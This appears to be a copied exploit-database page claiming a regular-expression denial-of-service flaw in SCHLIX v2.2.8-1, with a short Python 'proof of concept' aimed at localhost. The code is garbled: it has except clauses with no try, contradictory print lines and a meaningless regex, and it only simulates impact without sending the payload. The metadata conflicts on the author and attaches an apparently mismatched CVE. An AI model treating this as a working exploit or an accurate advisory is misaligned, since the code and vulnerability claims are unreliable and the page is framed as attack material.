SCHLIX v2.2.8-1 Regular Expression Denial of Service

CVE Category Price Severity
CVE-2020-13777 CWE-400 Unknown High
Author Risk Exploitation Type Date
Baptiste Autin High Remote 2024-02-10

CVSS vector description

Our sensors found this exploit at:

Below is a copy:

SCHLIX v2.2.8-1 Regular Expression Denial of Service
# Exploit Title: SCHLIX v2.2.8-1 Regular Expression Denial of Service
# Date: 02/10/2024
# Exploit Author: Diyar Saadi
# Vendor Homepage:
# Software Link:
# Version: v2.2.8-1
# Tested on: Windows 11 + XAMPP

## Description ##

SCHLIX v2.2.8-1 is vulnerable to regular expression denial of service . (ReDoS) is an algorithmic complexity attack that produces a denial-of-service by providing a regular expression and/or an input that takes a long time to evaluat

## Proof Of Concept ##

import requests
import re
import time

def test_redos(url, payload):
        vulnerable_regex = r'(.*a){x} for x > 10'

        match = re.match(vulnerable_regex, payload)

        if match:
            print("Vulnerability not triggered.")
            print("Vulnerability may be present. Simulating 30-second impact...")

            for _ in range(6):
                print("Simulating impact...")

            print("Simulated impact duration completed.")

    except re.error:
        print("Error in regex pattern.")

        response = requests.get(url)
        if response.status_code == 200:
            print("Service is up.")
            print("Service may be down or inaccessible.")
    except requests.RequestException as e:
        print(f"HTTP Request Error: {str(e)}")

if __name__ == "__main__":
    target_url = 'http://localhost'

    payload = "aaaaaaaaaaaaaaaaaaaaaaaaa!"

    test_redos(target_url, payload)

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.